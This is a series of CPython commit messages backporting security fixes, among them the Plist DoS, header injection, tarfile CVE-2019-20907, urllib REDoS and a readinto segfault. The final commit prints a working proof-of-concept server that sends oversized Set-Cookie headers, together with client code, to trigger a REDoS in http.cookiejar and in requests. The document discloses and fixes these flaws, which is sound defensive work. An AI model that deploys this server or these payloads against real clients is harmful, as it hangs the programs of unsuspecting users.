The existing volatile `left`/`right` pointers guarantee that the reads will all occur, but does not guarantee that they will be _used_. So a compiler can still short-circuit the loop, saving e.g. the overhead of doing the xors and especially the overhead of the data dependency between `result` and the reads. That would change performance depending on where the first unequal byte occurs. This change removes that optimization.
(This is change GH-1 from https://bugs.python.org/issue40791 .)
(cherry picked from commit 31729366e2)
Co-authored-by: Devin Jeanpierre <jeanpierreda@google.com>
Fix an assertion error in format() in debug build for floating point
formatting with "n" format, zero padding and small width. Release build is
not impacted. Patch by Karthikeyan Singaravelan.
(cherry picked from commit 3f7983a25a)
Co-authored-by: Xtreak <tir.karthi@gmail.com>
* Prevent some possible DoS attacks via providing invalid Plist files
with extremely large number of objects or collection sizes.
* Raise InvalidFileException for too large bytes and string size instead of returning garbage.
* Raise InvalidFileException instead of ValueError for specific invalid datetime (NaN).
* Raise InvalidFileException instead of TypeError for non-hashable dict keys.
* Add more tests for invalid Plist files..
(cherry picked from commit 34637a0ce2)
Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
reject control chars in http method in http.client.putrequest to prevent http header injection
(cherry picked from commit 8ca8a2e8fb)
Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
Avoid infinite loop when reading specially crafted TAR files using the tarfile module
(CVE-2019-20907).
(cherry picked from commit 5a8d121a1f)
Co-authored-by: Rishi <rishi_devan@mail.com>
* bpo-29778: Ensure python3.dll is loaded from correct locations when Python is embedded (GH-21298)
* bpo-29778: Ensure python3.dll is loaded from correct locations when Python is embedded.
* Add CVE number
* Updates for 3.6
CVE-2020-14422
The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
of generating constant hash values of 32 and 128 respectively causing hash collisions.
The fix uses the hash() function to generate hash values for the objects
instead of XOR operation
(cherry picked from commit b30ee26e36)
Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
Signed-off-by: Tapas Kundu <tkundu@vmware.com>
The AbstractBasicAuthHandler class of the urllib.request module uses
an inefficient regular expression which can be exploited by an
attacker to cause a denial of service. Fix the regex to prevent the
catastrophic backtracking. Vulnerability reported by Ben Caller
and Matt Schwager.
AbstractBasicAuthHandler of urllib.request now parses all
WWW-Authenticate HTTP headers and accepts multiple challenges per
header: use the realm of the first Basic challenge.
Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
(cherry picked from commit 0b297d4ff1)
Add host validation for control characters for more CVE-2019-18348 protection.
(cherry picked from commit 9165addc22)
Co-authored-by: Ashwin Ramaswami <aramaswamis@gmail.com>
When called on a closed object, readinto() segfaults on account
of a write to a freed buffer:
==220553== Process terminating with default action of signal 11 (SIGSEGV): dumping core
==220553== Access not within mapped region at address 0x2A
==220553== at 0x48408A0: memmove (vg_replace_strmem.c:1272)
==220553== by 0x58DB0C: _buffered_readinto_generic (bufferedio.c:972)
==220553== by 0x58DCBA: _io__Buffered_readinto_impl (bufferedio.c:1053)
==220553== by 0x58DCBA: _io__Buffered_readinto (bufferedio.c.h:253)
Reproducer:
reader = open ("/dev/zero", "rb")
_void = reader.read (42)
reader.close ()
reader.readinto (bytearray (42)) GH-GH-GH- BANG!
The problem exists since 2012 when commit dc469454ec added code
to free the read buffer on close().
Signed-off-by: Philipp Gesang <philipp.gesang@intra2net.com>
(cherry picked from commit cb1c0746f2)
Co-authored-by: Philipp Gesang <phg@phi-gamma.net>
Co-authored-by: Philipp Gesang <phg@phi-gamma.net>
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer
def make_set_cookie_value(n_spaces):
spaces = " " * n_spaces
expiry = f"1-c-1{spaces}!"
return f"b;Expires={expiry}"
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.log_request(204)
self.send_response_only(204) GH- Don't bother sending Server and Date
n_spaces = (
int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences
if len(self.path) > 1 else
65506 GH- Max header line length 65536
)
value = make_set_cookie_value(n_spaces)
for i in range(99): GH- Not necessary, but we can have up to 100 header lines
self.send_header("Set-Cookie", value)
self.end_headers()
if __name__ == "__main__":
HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb85)
Co-authored-by: bcaller <bcaller@users.noreply.github.com>